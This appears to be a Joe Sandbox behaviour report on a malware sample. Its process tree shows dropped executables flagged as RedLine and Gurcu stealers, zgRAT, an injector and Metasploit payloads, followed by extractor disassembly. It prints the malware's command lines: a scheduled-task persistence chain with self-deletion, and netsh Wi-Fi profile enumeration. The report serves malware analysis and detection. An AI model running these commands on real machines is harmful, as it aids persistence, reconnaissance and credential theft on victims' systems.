Commandline:	C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "8F82" /sc MINUTE /tr "C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe" /rl LIMITED /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\8F82.exe" &&START "" "C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe
Imagebase:	0x7ff739ca0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	10:02:29
Start date:	18/11/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	10:02:29
Start date:	18/11/2023
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6202b0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	10:02:29
Start date:	18/11/2023
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping 127.0.0.1
Imagebase:	0x7ff7b16c0000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	10:02:31
Start date:	18/11/2023
Path:	C:\Users\user\AppData\Local\Temp\9AED.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\9AED.exe
Imagebase:	0x400000
File size:	453'908 bytes
MD5 hash:	FF4691F6C1F0E701303C2B135345890E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000018.00000002.2633753789.0000000002531000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000018.00000002.2630979082.0000000000572000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000018.00000002.2630661047.0000000000416000.00000004.00000001.01000000.00000012.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 54%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	10:02:31
Start date:	18/11/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	10:02:33
Start date:	18/11/2023
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks /create /tn "8F82" /sc MINUTE /tr "C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe" /rl LIMITED /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	10:02:33
Start date:	18/11/2023
Path:	C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe"
Imagebase:	0x208f3f60000
File size:	114'176 bytes
MD5 hash:	52CC4016261C2CC9311F48B4D84C8D4E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 83%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	28
Start time:	10:02:34
Start date:	18/11/2023
Path:	C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe
Imagebase:	0x135c9960000
File size:	114'176 bytes
MD5 hash:	52CC4016261C2CC9311F48B4D84C8D4E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000001C.00000002.2066577791.00000135CB661000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	10:02:41
Start date:	18/11/2023
Path:	C:\Users\user\AppData\Local\ixas4a6gsv\tor\tor-real.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\ixas4a6gsv\tor\tor-real.exe" -f "C:\Users\user\AppData\Local\ixas4a6gsv\tor\torrc.txt
Imagebase:	0xc60000
File size:	4'229'632 bytes
MD5 hash:	07244A2C002FFDF1986B454429EACE0B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	30
Start time:	10:02:41
Start date:	18/11/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	31
Start time:	10:02:42
Start date:	18/11/2023
Path:	C:\Users\user\AppData\Local\Temp\C4AD.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\C4AD.exe
Imagebase:	0x7ff6df0b0000
File size:	17'031'168 bytes
MD5 hash:	03205A2FE1C1B6C9F6D38B9E12D7688F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Go lang
Yara matches:	Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 0000001F.00000002.2373883044.000000C00076C000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 0000001F.00000003.2175797793.000000C0003A0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 0000001F.00000003.2174358473.000000C000418000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 0000001F.00000002.2379752347.000000C000E54000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001F.00000003.2176077737.000000C00035E000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 0000001F.00000003.2174358473.000000C00042E000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 0000001F.00000003.2176077737.000000C0002C0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 0000001F.00000003.2171483498.000000C0004F8000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001F.00000002.2371460377.000000C000566000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 0000001F.00000003.2175797793.000000C0003B8000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 0000001F.00000003.2173330685.000000C0004BA000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 0000001F.00000003.2144147018.000000C000772000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001F.00000002.2371460377.000000C000530000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 0000001F.00000003.2171483498.000000C00076C000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001F.00000003.2243089557.000001FEC5590000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001F.00000003.2312747036.000001FEC5542000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001F.00000002.2368648905.000000C0003A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001F.00000002.2368648905.000000C000368000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001F.00000002.2371460377.000000C0004F8000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 33%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	10:02:43
Start date:	18/11/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]
Imagebase:	0x7ff739ca0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	10:02:43
Start date:	18/11/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	10:02:43
Start date:	18/11/2023
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6202b0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	10:02:43
Start date:	18/11/2023
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh wlan show profiles
Imagebase:	0x7ff7ba220000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	10:02:43
Start date:	18/11/2023
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	findstr /R /C:"[ ]:[ ]"
Imagebase:	0x7ff6ebb70000
File size:	36'352 bytes
MD5 hash:	804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	10:02:46
Start date:	18/11/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid \| findstr "SSID BSSID Signal
Imagebase:	0x7ff739ca0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	10:02:46
Start date:	18/11/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	10:02:46
Start date:	18/11/2023
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6202b0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	10:02:46
Start date:	18/11/2023
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh wlan show networks mode=bssid
Imagebase:	0x7ff7ba220000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	10:02:46
Start date:	18/11/2023
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	findstr "SSID BSSID Signal"
Imagebase:	0x7ff6ebb70000
File size:	36'352 bytes
MD5 hash:	804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	10:02:47
Start date:	18/11/2023
Path:	C:\Users\user\AppData\Local\Temp\D9EC.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\D9EC.exe
Imagebase:	0x1e94fe80000
File size:	1'057'280 bytes
MD5 hash:	2A42D97ACFD504A4E15577F165F63A40
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000002A.00000002.2317887669.000001E96A7A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000002A.00000002.2208933184.000001E951CD4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 21%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	10:02:48
Start date:	18/11/2023
Path:	C:\Users\user\AppData\Local\Temp\D9EC.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\D9EC.exe
Imagebase:	0x27d82630000
File size:	1'057'280 bytes
MD5 hash:	2A42D97ACFD504A4E15577F165F63A40
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: 0000002B.00000002.2426218610.0000027D9CC00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: 0000002B.00000002.2426218610.0000027D9CC00000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000002B.00000002.2261083821.0000027D84460000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000002B.00000002.2368041511.0000027D949BD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000002B.00000002.2264896125.0000027D84541000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000002B.00000002.2368041511.0000027D94C20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	10:02:53
Start date:	18/11/2023
Path:	C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe
Imagebase:	0x1af6b360000
File size:	1'057'280 bytes
MD5 hash:	2A42D97ACFD504A4E15577F165F63A40
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000002C.00000002.3059749646.000001AF10492000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000002C.00000002.2357995351.000001AF00212000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000002C.00000002.2357995351.000001AF00001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000002C.00000002.2357995351.000001AF0021A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000002C.00000002.2357995351.000001AF001FE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000002C.00000002.3059749646.000001AF1065E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000002C.00000002.2357995351.000001AF001FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 21%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	10:02:55
Start date:	18/11/2023
Path:	C:\Users\user\AppData\Local\Temp\39D.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\39D.exe
Imagebase:	0x630000
File size:	12'832'256 bytes
MD5 hash:	DCF08EB00B5C34D77A4C96DD3DA08422
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: MALWARE_Win_DLInjector04, Description: Detects downloader / injector, Source: C:\Users\user\AppData\Local\Temp\39D.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 83%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	10:02:57
Start date:	18/11/2023
Path:	C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe
Imagebase:	0x274fc490000
File size:	1'057'280 bytes
MD5 hash:	2A42D97ACFD504A4E15577F165F63A40
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Has exited:	false

Show Windows behavior

Target ID:	47
Start time:	10:02:59
Start date:	18/11/2023
Path:	C:\Users\user\AppData\Local\932079.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\932079.exe"
Imagebase:	0x180000
File size:	145'920 bytes
MD5 hash:	6C209163F8881E51E553F6C1B306D645
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 87%, ReversingLabs Detection: 79%, Virustotal, Browse
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	10:03:00
Start date:	18/11/2023
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
Imagebase:	0x480000
File size:	47'584 bytes
MD5 hash:	94C8E57A80DFCA2482DEDB87B93D4FD9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000030.00000002.2743323065.0000000002911000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000030.00000002.2743323065.00000000029AB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000030.00000002.2743323065.00000000029AB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	10:03:01
Start date:	18/11/2023
Path:	C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe
Imagebase:	0x17ea08b0000
File size:	114'176 bytes
MD5 hash:	52CC4016261C2CC9311F48B4D84C8D4E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	10:03:05
Start date:	18/11/2023
Path:	C:\Users\user\AppData\Local\Temp\InstallSetup5.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\InstallSetup5.exe"
Imagebase:	0x400000
File size:	2'311'455 bytes
MD5 hash:	7714DFF962CF31AF75ABF7F7A58166EF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 39%, ReversingLabs
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	27.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	29.6%
Total number of Nodes:	969
Total number of Limit Nodes:	47

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00FC202A Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 185
registrylibrarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00FC2050
memset.MSVCRT ref: 00FC205F
RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 00FC208C

Part of subcall function 00FC171E: _vsnprintf.MSVCRT ref: 00FC1750

RegQueryValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00FC20C9
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00FC20EA
GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00FC2103
LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00FC2122
GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00FC2134
FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00FC2144
GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00FC215B
GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00FC218C
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00FC21C1
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00FC21E4
RegSetValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 00FC223D
RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00FC2249
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00FC2250

Strings

rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00FC21F6
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00FC2082
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00FC21A8, 00FC2204
DelNodeRunDLL32, xrefs: 00FC212E
wextract_cleanup0, xrefs: 00FC20A5, 00FC20BE, 00FC20F0, 00FC2232
wextract_cleanup%d, xrefs: 00FC209E
advpack.dll, xrefs: 00FC2109
%s /D:%s, xrefs: 00FC21FF, 00FC2210

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
API String ID: 178549006-3726664654
Opcode ID: bfd3a48093d3302a7d960e0e04046c84f0d9ff2846f2fbaf9ff5b79a40d92526
Instruction ID: ddd46033357a309adcf641b3db84aab1deb826ab1d5483fa82ca2266e9fbb0db
Opcode Fuzzy Hash: bfd3a48093d3302a7d960e0e04046c84f0d9ff2846f2fbaf9ff5b79a40d92526
Instruction Fuzzy Hash: AE510671A4021EABDB209F20DE4FFEB772CEF44754F0401ACFA49E7151DA749D49AA60

Uniqueness

Uniqueness Score: -1.00%

Function 00FC3BA2 Relevance: 40.6, APIs: 11, Strings: 12, Instructions: 308
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00FC3C11
CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00FC3CDC

Part of subcall function 00FC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FC46A0
Part of subcall function 00FC468F: SizeofResource.KERNEL32(00000000,00000000,?,00FC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46A9
Part of subcall function 00FC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FC46C3
Part of subcall function 00FC468F: LoadResource.KERNEL32(00000000,00000000,?,00FC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46CC
Part of subcall function 00FC468F: LockResource.KERNEL32(00000000,?,00FC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46D3
Part of subcall function 00FC468F: memcpy_s.MSVCRT ref: 00FC46E5
Part of subcall function 00FC468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46EF

CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00FC8C42), ref: 00FC3D8F
GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00FC3E26
FreeLibrary.KERNEL32(00000000,?,00FC8C42), ref: 00FC3EFF
LocalFree.KERNEL32(?,?,?,?,00FC8C42), ref: 00FC3F1F
FreeLibrary.KERNEL32(00000000,?,00FC8C42), ref: 00FC3F40
LocalFree.KERNEL32(?,?,?,?,00FC8C42), ref: 00FC3F47
FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00FC8C42), ref: 00FC3F76
LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00FC8C42), ref: 00FC3F80
LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00FC8C42), ref: 00FC3FC2

Strings

POSTRUNPROGRAM, xrefs: 00FC3D60
DoInfInstall, xrefs: 00FC3E1F, 00FC3E24, 00FC3F68
D, xrefs: 00FC3C19
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00FC3E74
RUNPROGRAM, xrefs: 00FC3D05
<None>, xrefs: 00FC3CC9, 00FC3D7D
